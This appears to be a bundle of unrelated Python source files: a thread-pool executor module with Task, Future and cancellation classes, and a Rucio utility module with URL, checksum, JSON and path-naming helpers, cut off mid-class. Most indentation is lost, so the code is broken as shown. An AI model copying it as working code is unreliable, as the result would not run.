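    # newer "&start=<offset>" parameter after "n=500", depending on which
    # field the server returned.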
|
Concurrent.py
|
# encoding: utf-8
'''
Created on 2016/02/25
@author: _
'''
import Queue
import random
import sys
import threading
import time
import weakref
WORKER_THREAD_LIFETIME = 3 # seconds
THREAD_SIGNAL_TRACE_ENABLED = True # True if threading.settrace hack is enabled
_UNUSED_QUEUE_EMPTY = Queue.Empty # Sometimes the reference to Queue.Empty is released on process termination.
ERASE_UNHANDLED_TASK_EXCEPTION_FRAME_LOCALS = False
class ExecutorThreadInterrupt(Exception):
pass
class TaskError(Exception):
pass
class FutureError(Exception):
pass
class CancellationTokenSource(object):
"""
    (Like the .NET Framework class System.Threading.CancellationTokenSource.) This class represents a cancellation request for a task.
"""
class CancellationToken(object):
"""
            A token object used to check whether cancellation has been requested.
"""
def __init__(self, parent):
"""
Initializer
@param parent: A corresponding CancellationTokenSource object
"""
self.__parent = parent
@property
def isCancelled(self):
"""
Returns the corresponding CancellationTokenSource object's isCancelled property.
This method may be blocking.
"""
            return self.__parent.isCancelled
def __init__(self):
"""
Initialize
"""
self.__condition = threading.RLock()
self.__cancelled = False
def newToken(self):
"""
        Creates a new CancellationToken object
        @return: new CancellationToken object associated with this source
        """
        return self.CancellationToken(self)
@property
def isCancelled(self):
"""
Returns True if and only if this CancellationTokenSource had been 'Cancelled'.
@return: True if had been cancelled
"""
with self.__condition:
return self.__cancelled
def cancel(self):
"""
Mark this CancellationTokenSource object to 'Cancelled'.
This method may be blocking.
This method is executed atomically.
"""
with self.__condition:
self.__cancelled = True
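# Minimal usage sketch for the cancellation classes above (variable names are
# illustrative only):
#
#     cts = CancellationTokenSource()
#     token = cts.newToken()
#     token.isCancelled    # -> False
#     cts.cancel()
#     token.isCancelled    # -> True
#
# A long-running task body would typically poll token.isCancelled between work
# items and return early once it becomes True, as StepwiseTask does further
# below with its own cancellationTokenSource.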
class Executor(object):
"""
Simple thread-pool based executor.
"""
class WrappedThread(threading.Thread):
"""
Threads for Executor
"""
def __init__(self, parent):
threading.Thread.__init__(self)
self.__parent = parent
self.__taskQueue = Queue.Queue()
self.__exitLoop = False
def addTask(self, task):
"""
Adds a task into this thread.
@param task: a task
"""
self.__taskQueue.put(task, True)
def terminate(self): # no way to forcibly abort..?
"""
Sets termination flag to True
"""
self.__exitLoop = True
def run(self):
if THREAD_SIGNAL_TRACE_ENABLED:
sys.settrace(lambda frame, event, arg: None)
while not self.__exitLoop:
try:
currentTask = self.__taskQueue.get(True, timeout = WORKER_THREAD_LIFETIME)
self.currentTask = None
# print "(EXECUTE %s, %s)" % (currentTask.args, id(self))
currentTask()
except ExecutorThreadInterrupt:
# Thread is interrupted
break
except _UNUSED_QUEUE_EMPTY:
# Cannot obtain next task
break
except:
# unhandled exception
if callable(self.__parent.unhandledExceptionHandler):
self.__parent.unhandledExceptionHandler(self, currentTask)
self.__parent._detachThread(self)
# print "(UNASSOCIATE Thread %s)" % id(self)
self.__parent._purgeThread(self)
def _interrupt(self, executorThreadInterruptInstance = ExecutorThreadInterrupt()):
if not isinstance(executorThreadInterruptInstance, ExecutorThreadInterrupt):
raise ValueError("%s is not an instance of %s" % (executorThreadInterruptInstance, ExecutorThreadInterrupt))
            def raiseInterruptor(frame, event, arg):
                raise executorThreadInterruptInstance
targetFrame = None
for threadId, frame in sys._current_frames().viewitems():
if threadId == self.ident:
targetFrame = frame
break
else:
raise ValueError("Cannot identify self thread frame: %d" % self.ident)
while targetFrame:
if targetFrame.f_trace is None:
targetFrame.f_trace = raiseInterruptor
targetFrame = targetFrame.f_back
del targetFrame
def __init__(self, daemonize = True, poolMaxSize = None, unhandledExceptionHandler = None, taskType = None):
"""
Initializer
        @param daemonize: all worker threads are daemon threads if True
        @param poolMaxSize: maximum number of threads to spawn if the argument is a natural number (>= 1), or threads are spawned on demand if None
        @param unhandledExceptionHandler: a function invoked when an unhandled exception occurs (of the form lambda worker_thread, task: ...), or exceptions are ignored if None
        @param taskType: subtype of Task used to wrap submitted callables
"""
if not poolMaxSize is None and int(poolMaxSize) <= 0:
raise ValueError("Pool max size must be more than 0")
self.__pool = set()
self.__poolCondition = threading.Condition()
self.__submitted = Queue.Queue()
# self.__namedSubmitted = {}
self.__daemonize = daemonize
        self.__creationTime = 0 # number of currently existing worker threads (a running count, despite the name)
self.__maxSize = int(poolMaxSize) if not poolMaxSize is None else None
self.unhandledExceptionHandler = unhandledExceptionHandler
        self.taskType = taskType if (isinstance(taskType, type) and issubclass(taskType, Task)) else Task
self.__worker = threading.Thread(target = self.__acception)
self.__worker.daemon = True
with self.__poolCondition:
self.__worker.start()
def _detachThread(self, wrappedThread):
"""
        (internal) Returns a worker thread to the thread pool, making it available for reuse
"""
with self.__poolCondition:
self.__pool.add(wrappedThread)
self.__poolCondition.notifyAll()
def _purgeThread(self, wrappedThread):
"""
(internal) Purges thread from thread pool
"""
with self.__poolCondition:
self.__pool.remove(wrappedThread)
self.__poolCondition.notifyAll()
self.__creationTime -= 1
def _takeThread(self):
"""
(internal) Takes next available thread from thread pool, or creates new thread if no threads in the thread pool and the pool has space
"""
with self.__poolCondition:
if self.__pool:
return self.__pool.pop()
if self.__maxSize is None or self.__creationTime < self.__maxSize:
                t = self.WrappedThread(self)
                t.daemon = self.daemonize
                t.start()
self.__creationTime += 1
return t
else:
# wait for free thread
while len(self.__pool) == 0:
self.__poolCondition.wait()
return self.__pool.pop()
@property
def daemonize(self):
"""
True if threads in thread pool are daemonized
"""
return self.__daemonize
def submit(self, someCallable, *args, **kwds):
"""
Submits a new task into the Executor
@param someCallable: callable object to be wrapped into Task object or subtype of self.taskType object
@param args: positional arguments for the callable object
@param kwds: keyword arguments for the callable object
@return: new Future object
"""
# print "(SUBMITTED %s)" % args
task = self.taskType(someCallable, *args, **kwds) if not isinstance(someCallable, self.taskType) else someCallable
future = Future(task)
task._setFuture(future)
self.__submitted.put(task)
return future
def __acception(self):
"""
        (internal private) Takes an available thread and hands the next submitted task to it
"""
while True:
last = self.__submitted.get()
t = self._takeThread()
# print "(Accepted %s, thread=%s)" % (last.args, id(t))
t.addTask(last)
self.__submitted.task_done()
class Task(object):
"""
Represents a "Task".
Task object is null-ary callable object and if and only if results are filled when is invoked.
Results can be obtain by "getSafe" and "get" method when "isDone" method returns True(i.e "getSafe" and "get" can raise TaskError if task is incomplete).
"getSafe" is exception free and this method returns a pair of (task result, exc_info).
"get" returns if and only if 2nd value of the return value of "getSafe" is NOT None, or raises exception(2nd value) if the 2nd value IS None.
All methods are thread-safety.
"""
def __init__(self, taskBody, *args, **kwds):
"""
Initializer
@param taskBody: task body function
@param args: positional arguments of the taskBody
@param kwds: keyword arguments of the taskBody
@raise ValueError: the taskBody is not callable
"""
if not callable(taskBody):
raise ValueError("%s is not callable" % taskBody)
self.function = taskBody
self.args = args
self.kwds = kwds
self.__resultPair = None
self.__future = None
self.__then = None
self.__completeCondition = threading.Condition()
def isDone(self):
"""
Returns True if the task is completed.
"""
with self.__completeCondition:
return not self.__resultPair is None
def await(self, timeout = None):
"""
        Waits via threading.Condition.wait while the task is incomplete.
        @param timeout: a timeout value in seconds.
        @see threading.Condition.wait
"""
with self.__completeCondition:
while self.__resultPair is None:
self.__completeCondition.wait(timeout)
def cancel(self, cancellationType = ExecutorThreadInterrupt()):
t = threading.currentThread()
if not hasattr(t, "_interrupt"):
raise ValueError("Cannot interrupt")
t._interrupt(cancellationType)
def getSafe(self):
"""
Returns task results in the form of a pair of (task result, exc_info)
@return: a pair of (task result, exc_info)
"""
with self.__completeCondition:
if self.__resultPair is None:
#raise TaskError("%s is not done" % self)
return self.__call__()
return self.__resultPair
def get(self):
"""
Returns task results or raises exception.
@return: a results of the task
@raise: exception if the task is done with unhandled exception
"""
resultPair = self.getSafe()
if not resultPair[1] is None:
raise resultPair[1][0], resultPair[1][1], resultPair[1][2]
else:
return resultPair[0]
def then(self, thenBody, *args, **kwds):
"""
Appends then-clause into this task.
        The then-clauses are performed after the task body, chained in series, as long as no exception is raised.
        The result of the last then-clause becomes the task result.
@param thenBody: then-clause body function(forms like lambda lastResult, *args, **kwds: ..)
@param args: positional arguments of thenBody
@param kwds: keyword arguments of thenBody
@return: this Task object
"""
with self.__completeCondition:
if self.__resultPair:
raise TaskError("Task is already done")
thenParam = (thenBody, args, kwds)
if self.__then is None:
self.__then = [thenParam]
else:
self.__then.append(thenParam)
return self
def _setFuture(self, strongRefFuture):
"""
(internal) sets associated Future object by weakref
"""
self.__future = weakref.ref(strongRefFuture)
def __call__(self):
"""
        Performs the task and returns results in the same form as the "getSafe" method.
        The task body is executed only on the first invocation; later calls return the cached result pair.
@return: a pair of (task result, exc_info)
"""
with self.__completeCondition:
if not self.__resultPair is None:
return self.__resultPair
try:
partialResult = self.function(*self.args, **self.kwds)
if not self.__then is None:
for thenParam in self.__then:
partialResult = thenParam[0](partialResult, *thenParam[1], **thenParam[2])
self.__resultPair = (partialResult, None)
except:
excInfo = sys.exc_info()
if ERASE_UNHANDLED_TASK_EXCEPTION_FRAME_LOCALS:
                    currentExcInfo = excInfo[2].tb_next # top frame is here, 2nd frame is the task body
while currentExcInfo:
frame = currentExcInfo.tb_frame
frame.f_locals.clear()
currentExcInfo = currentExcInfo.tb_next
self.__resultPair = (None, excInfo)
sys.exc_clear()
self.__completeCondition.notifyAll()
maybeRef = self.__future() if not self.__future is None else None
if maybeRef:
maybeRef._markCompleted()
return self.__resultPair
class CancellableTask(Task):
"""
    This Task is a basic Task which can be cancelled through a CancellationTokenSource.
"""
def __init__(self, func, cancellationTokenSource = None, *args, **kwds):
"""
Initialize
@param func: task body function
@param cancellationTokenSource: a hook for cancellation
"""
super(CancellableTask, self).__init__(func, *args, **kwds)
self.cancellationTokenSource = cancellationTokenSource if isinstance(cancellationTokenSource, CancellationTokenSource) else CancellationTokenSource()
def cancel(self):
"""
Cancel task by corresponding CancellationTokenSource
"""
self.cancellationTokenSource.cancel()
class StepwiseTask(CancellableTask):
"""
    Task which steps a generator continuously while the generator yields a True-like value.
"""
def __init__(self, annotatee, cancellationTokenSource = None, *args, **kwds):
"""
Initialize
        @param annotatee: a generator function. The generator is stepped continuously while it yields a True-like value.
@param cancellationTokenSource: a hook for cancellation
"""
super(StepwiseTask, self).__init__(annotatee, cancellationTokenSource, *args, **kwds)
self.then(self.__stepwise__)
def __stepwise__(self, gen):
for elm in gen:
if not elm or self.cancellationTokenSource.isCancelled:
return
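# Illustrative sketch: a StepwiseTask wraps a generator so that each yield is
# one "step"; __stepwise__ stops as soon as the generator yields a falsy value
# or the associated CancellationTokenSource is cancelled.  "executor" below is
# an assumed Executor instance, not something defined in this module.
#
#     def producer():
#         for i in xrange(5):
#             print "step %d" % i
#             yield True          # keep going; yield False/None to stop
#
#     cts = CancellationTokenSource()
#     future = executor.submit(StepwiseTask(producer, cts))
#     # ... later, from another thread:
#     cts.cancel()                # the task stops after the current step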
class Future(object):
"""
    Represents the Future pattern.
    In this context, a Future is the eventual result of the corresponding task.
"""
def __init__(self, task):
"""
Initializer
@param task: Task object which to be performed in the future
"""
self.__task = task
self.__completed = False
self.__completedCondition = threading.Condition()
def _markCompleted(self):
"""
        (internal) Marks this future object as decided
"""
with self.__completedCondition:
self.__completed = True
self.__completedCondition.notifyAll()
@property
def task(self):
"""
Associated Task object
"""
return self.__task
@property
def completed(self):
"""
Whether this future object is decided
"""
with self.__completedCondition:
return self.__completed
def cancel(self, timeoutForCancel = None, cancellationType = ExecutorThreadInterrupt()):
# TODO
self.__task.cancel(cancellationType)
if not timeoutForCancel is None:
with self.__completedCondition:
while not self.__completed:
self.__completedCondition.wait(timeoutForCancel)
def getSafe(self, timeout = None):
"""
Returns associated Task object's results.
This method may be blocking while the Task object is performed.
@param timeout: timeout in seconds
@return: the results of the associated Task object
@see: threading.Condition.wait
@see: Task.getSafe
"""
with self.__completedCondition:
while not self.__completed:
self.__completedCondition.wait(timeout)
return self.__task.getSafe()
def get(self, timeout = None):
"""
Returns the associated Task object's results, or raises an exception if the Task object finished abnormally.
This method may be blocking while the Task object is performed.
@param timeout: timeout in seconds
@return: the results of the associated Task object
@raise: exception if the task is done with unhandled exception
@see: threading.Condition.wait
"""
result, exc_info = self.getSafe(timeout)
if exc_info:
raise exc_info[0], exc_info[1], exc_info[2]
else:
return result
def __call__(self, timeout = None):
return self.get(timeout)
if __name__ == "__main__":
ex = Executor(True, 10)
def heavyTask(taskId):
n = random.randint(10, 1000)
print "(TASK %2d await %s msec)" % (taskId, n)
time.sleep(n / 1000.0)
print "(TASK %2d exit)" % taskId
return taskId
futures = [ex.submit(heavyTask, i) for i in xrange(20)]
terms = []
for f in futures:
terms.append(f.get())
print terms
print "TERMINATED, waiting"
time.sleep(WORKER_THREAD_LIFETIME + 1)
print "May all worker threads are dead"
def fooTask(a, b):
a = float(a)
b = float(b)
c = a / b
print "%f/%f = %f" % (a, b, c)
return c
t = Task(fooTask, 3, 2).then(fooTask, 2).then(fooTask, 1).then(fooTask, 0)
print t.getSafe()
def yieldFunc():
for x in xrange(10):
print "x=%d" % x
yield True
print "end"
f = ex.submit(StepwiseTask(yieldFunc))
print f()
def infTask():
c = threading.Condition()
with c:
print "Awaiting"
c.wait()
f = ex.submit(infTask)
print f.get(0.5)
f.cancel()
print f.get()
|
utils.py
|
# Copyright 2012-2019 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2017
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2018
# - Frank Berghaus, <frank.berghaus@cern.ch>, 2017
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister, <andrew.lister@stfc.ac.uk>, 2019
#
# PY3K COMPATIBLE
from __future__ import print_function
import base64
import datetime
import errno
import hashlib
import imp
import json
import os
import pwd
import re
import requests
import socket
import subprocess
import threading
import time
import zlib
from getpass import getuser
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from six import string_types
from xml.etree import ElementTree
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError
from rucio.common.types import InternalAccount, InternalScope
# delay import until function to avoid circular dependency (note here for reference)
# from rucio.core.rse import get_rse_name
# Extra modules: Only imported if available
EXTRA_MODULES = {'web': False,
'paramiko': False,
'flask': False}
try:
from rucio.db.sqla.enum import EnumSymbol
EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
EXTRA_MODULES['rucio.db.sqla.enum'] = False
for extra_module in EXTRA_MODULES:
try:
imp.find_module(extra_module)
EXTRA_MODULES[extra_module] = True
except ImportError:
EXTRA_MODULES[extra_module] = False
if EXTRA_MODULES['web']:
from web import HTTPError
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
if EXTRA_MODULES['flask']:
from flask import Response
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
Utility function to build a URL for requests to the Rucio system.
If the optional parameter doseq evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
complete_url += "/"
if path is not None:
complete_url += path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
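# Illustrative sketch (not part of the original module): how build_url composes a request URL.
# The host below is a placeholder, not a real Rucio endpoint.
#   >>> build_url('https://rucio.example.org', path='dids', params={'name': 'x'})
#   'https://rucio.example.org/dids?name=x'
#   >>> build_url('https://rucio.example.org', path='dids', params={'type': ['a', 'b']}, doseq=True)
#   'https://rucio.example.org/dids?type=a&type=b'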
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
def clean_headers(msg):
invalid_characters = ['\n', '\r']
for c in invalid_characters:
msg = str(msg).replace(c, ' ')
return msg
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:returns: Hexadecimal string, zero-padded to 8 characters.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'rb') as openFile:
for line in openFile:
adler = zlib.adler32(line, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
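# Illustrative round trip (not part of the original module), assuming an English locale for %a/%b:
#   >>> date_to_str(datetime.datetime(2019, 5, 13, 10, 23, 50))
#   'Mon, 13 May 2019 10:23:50 UTC'
#   >>> str_to_date('Mon, 13 May 2019 10:23:50 UTC')
#   datetime.datetime(2019, 5, 13, 10, 23, 50)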
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only date-like format
# supported at the domain schema level is 'datetime'.
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, EnumSymbol):
return obj.description
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(l):
""" JSON render function for list
"""
return json.dumps(l, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
ret_obj = None
try:
ret_obj = data.decode('utf-8')
except AttributeError:
ret_obj = data
return json.loads(ret_obj, object_hook=datetime_parser)
def generate_http_error(status_code, exc_cls, exc_msg):
"""
Utility function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
status = codes[status_code]
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
headers = {'Content-Type': 'application/octet-stream',
'ExceptionClass': exc_cls,
'ExceptionMessage': clean_headers(exc_msg)}
try:
return HTTPError(status, headers=headers, data=render_json(**data))
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def generate_http_error_flask(status_code, exc_cls, exc_msg):
"""
Utility function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a Flask HTTP response object.
"""
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
resp = Response(response=render_json(**data), status=status_code, content_type='application/octet-stream')
resp.headers['ExceptionClass'] = exc_cls
resp.headers['ExceptionMessage'] = clean_headers(exc_msg)
try:
return resp
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = ''
err = ''
exitcode = 0
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out, err
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(l), n):
yield l[i:i + n]
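# Illustrative sketch (not part of the original module): chunks() yields lists, grouper() yields padded tuples.
#   >>> list(chunks([1, 2, 3, 4, 5], 2))
#   [[1, 2], [3, 4], [5]]
#   >>> list(grouper('ABCDE', 3, 'x'))
#   [('A', 'B', 'C'), ('D', 'E', 'x')]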
def my_key_generator(namespace, fn, **kw):
"""
Customized key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def get_logger(name):
logger = getLogger(name)
hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(config_get('common', 'loglevel').upper())
return logger
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)  # fields[2] does not exist for a two-field dsn
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
def construct_surl(dsn, filename, naming_convention=None):
if naming_convention == 'T0':
return construct_surl_T0(dsn, filename)
elif naming_convention == 'DQ2':
return construct_surl_DQ2(dsn, filename)
elif naming_convention == 'BelleII':
return construct_surl_BelleII(dsn, filename)
return construct_surl_DQ2(dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _dis, _sub and _frag suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _dis, _sub and _tid suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub('/srm/managerv1\?SFN=', '', surl)
surl = re.sub('/srm/v2/server\?SFN=', '', surl)
surl = re.sub('/srm/managerv2\?SFN=', '', surl)
res.append(surl)
res.sort()
return res
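# Illustrative sketch (not part of the original module); the storage host below is a placeholder.
# clean_surls strips the SRM port and web-service prefix, then sorts the result:
#   >>> clean_surls(['srm://se.example.org:8443/srm/managerv2?SFN=/store/f1'])
#   ['srm://se.example.org/store/f1']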
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
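# Illustrative sketch (not part of the original module), on UNIX:
#   >>> pid_exists(os.getpid())
#   True
#   >>> pid_exists(-1)
#   False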
def sizefmt(num, human=True):
"""
Return a human readable file size string
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
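# Illustrative sketch (not part of the original module): sizefmt uses decimal (powers of 1000) units.
#   >>> sizefmt(12345)
#   '12.345 kB'
#   >>> sizefmt(12345, human=False)
#   '12345'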
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
user, tmp_dir = None, None
try:
user = pwd.getpwuid(os.getuid()).pw_name
except Exception:
pass
for env_var in ('TMP', 'TMPDIR', 'TEMP'):
if env_var in os.environ:
tmp_dir = os.environ[env_var]
break
if not user:
user = getuser()
if not tmp_dir:
return '/tmp/' + user + '/'
return tmp_dir + '/' + user + '/'
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = '^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
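# Illustrative sketch (not part of the original module):
#   >>> is_archive('data.tar.gz')
#   True
#   >>> is_archive('data.root')
#   False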
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
